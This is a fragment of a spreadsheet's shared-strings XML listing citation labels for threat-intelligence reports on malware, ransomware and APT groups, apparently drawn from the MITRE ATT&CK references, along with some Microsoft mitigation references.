    <t>(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: LogRhythm WannaCry),(Citation: Qualys Hermetic Wiper March 2022),(Citation: ESET InvisiMole June 2018),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: CrowdStrike Ryuk January 2019),(Citation: ESET Hermetic Wizard March 2022),(Citation: Dragos EKANS),(Citation: Secureworks REvil September 2019),(Citation: Talos Olympic Destroyer 2018),(Citation: TrendMicro Netwalker May 2020),(Citation: Check Point Meteor Aug 2021),(Citation: Cisco H1N1 Part 2),(Citation: Fortinet Diavol July 2021),(Citation: Intel 471 REvil March 2020),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: Palo Alto Unit 42 EKANS),(Citation: Carbon Black JCry May 2019),(Citation: Crowdstrike Indrik November 2018),(Citation: CERT-FR PYSA April 2020),(Citation: Cylance Sodinokibi July 2019),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Arxiv Avaddon Feb 2021),(Citation: Prevailion DarkWatchman 2021),(Citation: Sophos Netwalker May 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: Picus Sodinokibi January 2020),(Citation: SANS Conficker),(Citation: Hornet Security Avaddon June 2020),(Citation: FireEye WannaCry 2017),(Citation: Sophos Maze VM September 2020),(Citation: IBM MegaCortex),(Citation: SecureWorks WannaCry Analysis),(Citation: NCC Group WastedLocker June 2020),(Citation: FireEye FiveHands April 2021),(Citation: Talos Sodinokibi April 2019),(Citation: Kaspersky Sodin July 2019),(Citation: Sophos Ragnar May 2020),(Citation: Symantec WastedLocker June 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Group IB Ransomware September 2020),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: McAfee Babuk February 2021),(Citation: McAfee Maze March 2020),(Citation: Mcafee Clop Aug 2019),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: ESET Kobalos Jan 2021),(Citation: Korean FSI TA505 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: ESET Kobalos Feb 2021),</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Ursnif Mar 2015),(Citation: Talos ZxShell Oct 2014),(Citation: Unit 42 NOKKI Sept 2018),(Citation: FireEye FIN7 Oct 2019),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Prevx Carberp March 2011),(Citation: Elastic Process Injection July 2017),(Citation: GDATA Zeus Panda June 2017),(Citation: FinFisher Citation),(Citation: Securelist Sofacy Feb 2018),(Citation: Github PowerShell Empire),</t>
  </si>
  <si>
    <t>(Citation: synack 2016 review),(Citation: Symantec Calisto July 2018),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: trendmicro xcsset xcode project 2020),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: MacKeeper Bundlore Apr 2019),(Citation: FireEye Metamorfo Apr 2018),(Citation: objsee mac malware 2017),</t>
  </si>
  <si>
    <t>(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Talos ZxShell Oct 2014),(Citation: Secureworks Karagany July 2019),(Citation: KISA Operation Muzabi),(Citation: Scarlet Mimic Jan 2016),(Citation: Volexity Patchwork June 2018),(Citation: Trend Micro njRAT 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: CISA EB Aug 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: Baumgartner Naikon 2015),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Alintanahin 2014),(Citation: Unit 42 Nokki Oct 2018),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: Talos PoetRAT April 2020),(Citation: FireEye Poison Ivy),(Citation: Mandiant APT1 Appendix),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Zscaler Kasidet),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: NCC Group APT15 Alive and Strong),(Citation: Kaspersky Carbanak),(Citation: ESET RTM Feb 2017),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Cylance Cleaver),(Citation: Symantec Darkmoon Aug 2005),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Fidelis njRAT June 2013),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: Trend Micro Qakbot December 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CopyKittens Nov 2015),(Citation: Fortinet Agent Tesla June 2017),(Citation: DOJ GRU Indictment Jul 2018),(Citation: McAfee Netwire Mar 2015),(Citation: Dell TG-3390),(Citation: Symantec Chafer Dec 2015),(Citation: objsee mac malware 2017),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: jRAT Symantec Aug 2018),(Citation: FireEye NETWIRE March 2019),(Citation: BH Manul Aug 2016),(Citation: Check Point Rocket Kitten),(Citation: Zscaler Cobian Aug 2017),(Citation: GitHub Pupy),(Citation: 360 Machete Sep 2020),(Citation: Cylance Machete Mar 2017),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Profero APT27 December 2020),(Citation: Novetta Blockbuster Tools),(Citation: Cybereason PowerLess February 2022),(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Fysbis Palo Alto Analysis),(Citation: Symantec Catchamas April 2018),(Citation: Symantec Sowbug Nov 2017),(Citation: Github PowerShell Empire),(Citation: Rapid7 KeyBoy Jun 2013),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Kaspersky Darkhotel),(Citation: Bitdefender APT28 Dec 2015),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: SentinelOne MacMa Nov 2021),(Citation: FireEye SMOKEDHAM June 2021),(Citation: TrendMicro DarkComet Sept 2014),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ESET Okrum July 2019),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: Securelist Dtrack),(Citation: Symantec Remsec IOCs),(Citation: TrendMicro Tonto Team October 2020),(Citation: FireEye APT37 Feb 2018),(Citation: FireEye APT34 July 2019),(Citation: cobaltstrike manual),(Citation: Palo Alto Rover),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Alienvault Sykipot DOD Smart Cards),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: FSecure Lokibot November 2019),(Citation: XAgentOSX 2017),(Citation: Talos ROKRAT),(Citation: Trendmicro Evolving ThiefQuest 2020),(Citation: PaloAlto NanoCore Feb 2016),(Citation: ESET Telebots Dec 2016),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Fortinet Remcos Feb 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: Symantec Chafer February 2018),(Citation: Unit42 Redaman January 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Talos Remcos Aug 2018),(Citation: Palo Alto MoonWind March 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Konni May 2017),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Machete July 2019),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Check Point Warzone Feb 2020),(Citation: Kaspersky NetTraveler),(Citation: Imminent Unit42 Dec2019),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: EST Kimsuky April 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Citizen Lab Group5),(Citation: Unit42 BabyShark Apr 2019),(Citation: Symantec Buckeye),(Citation: Microsoft NICKEL December 2021),(Citation: Securelist Kimsuky Sept 2013),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: GitHub QuasarRAT),(Citation: TrendMicro BlackTech June 2017),(Citation: Cybereason Kimsuky November 2020),(Citation: Kaspersky TajMahal April 2019),(Citation: GitHub PoshC2),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: McAfee Cuba April 2021),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: GDATA Zeus Panda June 2017),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Gh0stRAT ATT March 2019),(Citation: Kroll Qakbot June 2020),(Citation: Novetta Blockbuster),(Citation: F-Secure The Dukes),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Kaspersky Regin),(Citation: CISA AA20-301A Kimsuky),(Citation: DustySky),(Citation: Kaspersky Lyceum October 2021),(Citation: Talos NavRAT May 2018),(Citation: Talos Agent Tesla Oct 2018),(Citation: Symantec W32.Duqu),(Citation: Objective-See MacMa Nov 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: Hacker News LuckyMouse June 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Kaspersky Adwind Feb 2016),(Citation: Securelist Machete Aug 2014),(Citation: CIRCL PlugX March 2013),(Citation: Securelist LuckyMouse June 2018),(Citation: SecureWorks August 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: FireEye APT38 Oct 2018),(Citation: ASERT Donot March 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: FireEye CARBANAK June 2017),(Citation: Talent-Jump Clambling February 2020),(Citation: Securelist Remexi Jan 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Radware Micropsia July 2018),(Citation: GitHub PowerSploit May 2012),(Citation: Trend Micro Daserf Nov 2017),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: Microsoft SIR Vol 19),(Citation: Crowdstrike DNC June 2016),(Citation: CISA MAR SLOTHFULMEDIA October 2020),</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike IceApple May 2022),</t>
  </si>
  <si>
    <t>(Citation: Accenture HyperStack October 2020),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: Microsoft Process Wide Com Keys),(Citation: Microsoft DDE Advisory Nov 2017),(Citation: Microsoft ADV170021 Dec 2017),(Citation: Microsoft System Wide Com Keys),(Citation: Microsoft COM ACL),(Citation: BleepingComputer DDE Disabled in Word Dec 2017),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: Enigma Reviving DDE Jan 2018),(Citation: Microsoft Protected View),(Citation: Microsoft ASR Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: Bromium Ursnif Mar 2017),(Citation: Proofpoint Bumblebee April 2022),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: Microsoft NICKEL December 2021),(Citation: ESET InvisiMole June 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Eset Ramsay May 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: ESET Trickbot Oct 2020),(Citation: ClearSky MuddyWater June 2019),(Citation: Securelist MuddyWater Oct 2018),(Citation: ESET Gelsemium June 2021),(Citation: Microsoft Protected View),(Citation: Microsoft COM ACL),(Citation: Microsoft System Wide Com Keys),(Citation: Microsoft Process Wide Com Keys)</t>
  </si>
  <si>
    <t>(Citation: Securelist ScarCruft Jun 2016),(Citation: McAfee APT28 DDE2 Nov 2017),(Citation: McAfee APT28 DDE1 Nov 2017),(Citation: Palo Alto Sofacy 06-2018),(Citation: Eset Ramsay May 2020),(Citation: Accenture MUDCARP March 2019),(Citation: Proofpoint TA505 June 2018),(Citation: PWC KeyBoys Feb 2017),(Citation: Talos Cobalt Group July 2018),(Citation: Talos GravityRAT),(Citation: Talos PoetRAT April 2020),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Rewterz Sidewinder APT April 2020),(Citation: ESET RTM Feb 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Securelist MuddyWater Oct 2018),(Citation: FireEye HAWKBALL Jun 2019),(Citation: CyberScoop FIN7 Oct 2017),(Citation: SentinelOne Valak June 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Symantec Gallmaker Oct 2018),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Microsoft DDE Advisory Nov 2017),(Citation: Microsoft ADV170021 Dec 2017),(Citation: BleepingComputer DDE Disabled in Word Dec 2017),(Citation: GitHub Disable DDEAUTO Oct 2017),(Citation: Enigma Reviving DDE Jan 2018),(Citation: Microsoft Protected View),(Citation: Microsoft ASR Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: ESET Gamaredon June 2020),(Citation: SecureWorks August 2019),(Citation: KISA Operation Muzabi),(Citation: ClearSky Lazarus Aug 2020),</t>
  </si>
  <si>
    <t>(Citation: LogRhythm WannaCry),(Citation: ESET Turla PowerShell May 2019),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Dragos Crashoverride 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: Microsoft GALLIUM December 2019),(Citation: Microsoft About BITS),(Citation: LOLBAS Esentutl),(Citation: DustySky),(Citation: LOLBAS Expand),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: TechNet Copy),(Citation: Linux FTP),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Unit42 LockerGoga 2019),(Citation: Sophos Netwalker May 2020),(Citation: Microsoft FTP),(Citation: Symantec Waterbug Jun 2019),(Citation: FireEye FIN10 June 2017),(Citation: FoxIT Wocao December 2019),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Palo Alto Shamoon Nov 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: PsExec Russinovich),(Citation: NCC Group Chimera January 2021),(Citation: University of Birmingham C2),(Citation: Microsoft Preventing SMB)</t>
  </si>
  <si>
    <t>(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Google Election Threats October 2020),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Check Point APT34 April 2021),(Citation: ESET Dukes October 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Trend Micro DRBControl February 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Eset Ramsay May 2020),(Citation: KISA Operation Muzabi),(Citation: NTT Security Flagpro new December 2021),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Cisco Talos Intelligence Group),(Citation: Medium S2W WhisperGate January 2022),(Citation: Securelist Octopus Oct 2018),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: BlackBerry Bahamut),(Citation: Talos Bisonal Mar 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: trendmicro xcsset xcode project 2020),(Citation: Trend Micro Tick November 2019),(Citation: Unit42 Redaman January 2019),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Unit 42 TA551 Jan 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Prevailion DarkWatchman 2021),(Citation: McAfee Honeybee),(Citation: ClearSky Siamesekitten August 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Symantec RAINDROP January 2021),(Citation: Cylance Dust Storm),(Citation: MSTIC FoggyWeb September 2021),(Citation: SentinelOne NobleBaron June 2021),(Citation: objective-see windtail1 dec 2018),(Citation: Cyberreason Anchor December 2019),(Citation: ANSSI RYUK RANSOMWARE),(Citation: US-CERT TA18-074A),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Group IB Ransomware September 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: McAfee Lazarus Jul 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Talos Nyetya June 2017),(Citation: FireEye APT10 Sept 2018),(Citation: Twitter ItsReallyNick Platinum Masquerade),</t>
  </si>
  <si>
    <t>(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Cybereason Bazar July 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: HowToGeek ShowExtension),(Citation: Seqrite DoubleExtension)</t>
  </si>
  <si>
    <t>(Citation: objective-see windtail1 dec 2018),(Citation: Kaspersky Regin),(Citation: Securelist ScarCruft Jun 2016),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: SANS Windshift August 2018),(Citation: McAfee Netwire Mar 2015),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ESET Gelsemium June 2021),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Bitdefender Naikon April 2021),(Citation: Talos Promethium June 2020),(Citation: Morphisec FIN7 June 2017),(Citation: ASERT InnaputRAT April 2018),(Citation: FireEye APT10 April 2017),(Citation: Symantec Volgmer Aug 2014),(Citation: Microsoft SAM),(Citation: ESET ComRAT May 2020),(Citation: Malwarebytes Higaisa 2020),(Citation: ClearSky MuddyWater Nov 2018),(Citation: FireEye APT32 May 2017),(Citation: CISA AA20-301A Kimsuky),(Citation: Malwarebytes Konni Aug 2021),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Check Point Meteor Aug 2021),(Citation: Kroll RawPOS Jan 2017),(Citation: Microsoft Win Defender Truvasys Sep 2017),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Symantec Catchamas April 2018),(Citation: ESET Telebots Dec 2016),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Unit 42 Hildegard Malware),(Citation: Unit42 Redaman January 2019),(Citation: FireEye FIN6 Apr 2019),(Citation: Cybereason Bazar July 2020),(Citation: Symantec Orangeworm April 2018),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: ESET Crutch December 2020),(Citation: Volexity SolarWinds),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Mandiant APT1 Appendix),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: ESET Machete July 2019),(Citation: Fysbis Dr Web Analysis),(Citation: FOX-IT May 2016 Mofang),(Citation: Kaspersky Carbanak),(Citation: Sophos Maze VM September 2020),(Citation: Tarrask scheduled task),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Unit42 RDAT July 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: ESET TeleBots Oct 2018),(Citation: ESET Okrum July 2019),(Citation: Zscaler Higaisa 2020),(Citation: McAfee Shamoon December 2018),(Citation: Symantec Backdoor.Nidiran),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Trend Micro Tick November 2019),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: Group IB APT 41 June 2021),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: TrendMicro RawPOS April 2015),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: ESET InvisiMole June 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: ESET Attor Oct 2019),(Citation: Intrinsec Egregor Nov 2020),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Talos Frankenstein June 2019),(Citation: Talos TinyTurla September 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: ESET InvisiMole June 2018),(Citation: Lotus Blossom Jun 2015),(Citation: Proofpoint TA416 Europe March 2022),(Citation: KISA Operation Muzabi),(Citation: Dragos EKANS),(Citation: Volexity Patchwork June 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: Baumgartner Naikon 2015),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Mandiant APT1 Appendix),(Citation: ESET Gelsemium June 2021),(Citation: Volexity SolarWinds),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Microsoft FinFisher March 2018),(Citation: Unit 42 Gamaredon February 2022),(Citation: Trusteer Carberp October 2010),(Citation: Secureworks MCMD July 2019),(Citation: Fysbis Dr Web Analysis),(Citation: ClearSky Siamesekitten August 2021),(Citation: Leonardo Turla Penquin May 2020),(Citation: Kaspersky Carbanak),(Citation: RedCanary Mockingbird May 2020),(Citation: Kaspersky ProjectSauron Full Report),(Citation: MSTIC FoggyWeb September 2021),(Citation: Volexity Ocean Lotus November 2020),(Citation: TrendMicro Ursnif Mar 2015),(Citation: Bitdefender StrongPity June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Dell TG-3390),(Citation: Microsoft DUBNIUM June 2016),(Citation: Cycraft Chimera April 2020),(Citation: Talos Promethium June 2020),(Citation: ZScaler Hacking Team),(Citation: Eset Ramsay May 2020),(Citation: 360 Machete Sep 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Guidepoint SUPERNOVA Dec 2020),(Citation: Securelist Octopus Oct 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: Talos Bisonal Mar 2020),(Citation: IBM Grandoreiro April 2020),(Citation: CyberBit Dtrack),(Citation: Symantec Sowbug Nov 2017),(Citation: Symantec Whitefly March 2019),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Kaspersky WIRTE November 2021),(Citation: CERT-FR PYSA April 2020),(Citation: Talos Rocke August 2018),(Citation: Cybereason Bazar July 2020),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Picus Sodinokibi January 2020),(Citation: Intezer Doki July 20),(Citation: Secure List Bad Rabbit),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: TrendMicro DarkComet Sept 2014),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Dust Storm),(Citation: Symantec Remsec IOCs),(Citation: Carbon Black Shlayer Feb 2019),(Citation: FireEye MuddyWater Mar 2018),(Citation: ESET Bad Rabbit),(Citation: Malwarebytes Pony April 2016),(Citation: CrowdStrike IceApple May 2022),(Citation: Trend Micro Skidmap),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Forcepoint Felismus Mar 2017),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Qualys LolZarus),(Citation: CrowdStrike Ryuk January 2019),(Citation: Microsoft DTC),(Citation: FinFisher Citation),(Citation: Morphisec ShellTea June 2019),(Citation: Intego Shlayer Feb 2018),(Citation: Trustwave GoldenSpy June 2020),(Citation: Cisco Talos Intelligence Group),(Citation: ESET LightNeuron May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: NCC Group Team9 June 2020),(Citation: Unit42 SUPERNOVA Dec 2020),(Citation: Anomali Static Kitten February 2021),(Citation: ESET Telebots Dec 2016),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: wardle evilquest partii),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ESET Sednit USBStealer 2014),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Konni May 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: ESET Machete July 2019),(Citation: McAfee Honeybee),(Citation: Cybereason StrifeWater Feb 2022),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Tarrask scheduled task),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Kaspersky Poseidon Group),(Citation: Unit42 RDAT July 2020),(Citation: FireEye admin@338),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Symantec RAINDROP January 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Cymmetria Patchwork),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: FireEye TRITON 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Group IB APT 41 June 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft NICKEL December 2021),(Citation: FBI FLASH APT39 September 2020),(Citation: Antiy CERT Ramsay April 2020),(Citation: Recorded Future REDDELTA July 2020),(Citation: Cybereason Kimsuky November 2020),(Citation: Microsoft Winnti Jan 2017),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: Unit 42 MechaFlounder March 2019),(Citation: ASERT InnaputRAT April 2018),(Citation: McAfee Cuba April 2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: BitDefender Chafer May 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: reed thiefquest ransomware analysis),(Citation: ESET Lazarus Jun 2020),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Securelist Calisto July 2018),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Trend Micro IXESHE 2012),(Citation: Talos MuddyWater May 2019),(Citation: Securelist Machete Aug 2014),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET PipeMon May 2020),(Citation: Unit 42 QUADAGENT July 2018),(Citation: SentinelOne NobleBaron June 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Prevx Carberp March 2011),(Citation: Symantec Tick Apr 2016),(Citation: ESET InvisiMole June 2020),(Citation: Group IB Silence Sept 2018),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Talos TinyTurla September 2021),</t>
  </si>
  <si>
    <t>(Citation: F-Secure CozyDuke),(Citation: Cybereason Soft Cell June 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: Qualys LolZarus),(Citation: FireEye APT10 Sept 2018),(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade),</t>
  </si>
  <si>
    <t>(Citation: Scarlet Mimic Jan 2016),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Trend Micro Tick November 2019),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: TrendMicro BlackTech June 2017),</t>
  </si>
  <si>
    <t>(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: ESET ForSSHe December 2018),(Citation: ESET Ebury Feb 2014),(Citation: TechNet Credential Theft),(Citation: MagicWeb),(Citation: Microsoft LSA),(Citation: store_pwd_rev_enc),(Citation: Microsoft Securing Privileged Access),(Citation: Mandiant Azure AD Backdoors),(Citation: TechNet Least Privilege)</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020),(Citation: Dell Skeleton),(Citation: Microsoft LSA),(Citation: Microsoft Securing Privileged Access),(Citation: TechNet Credential Theft),(Citation: TechNet Least Privilege)</t>
  </si>
  <si>
    <t>(Citation: AADInternals Azure AD On-Prem to Cloud),(Citation: MagicWeb),(Citation: Mandiant Azure AD Backdoors),(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>(Citation: Mandiant - Synful Knock),(Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky ProjectSauron Full Report),</t>
  </si>
  <si>
    <t>(Citation: ESET Ebury Oct 2017),(Citation: Trend Micro Skidmap),</t>
  </si>
  <si>
    <t>,(Citation: store_pwd_rev_enc),(Citation: Microsoft Securing Privileged Access),(Citation: TechNet Credential Theft),(Citation: TechNet Least Privilege)</t>
  </si>
  <si>
    <t>,(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
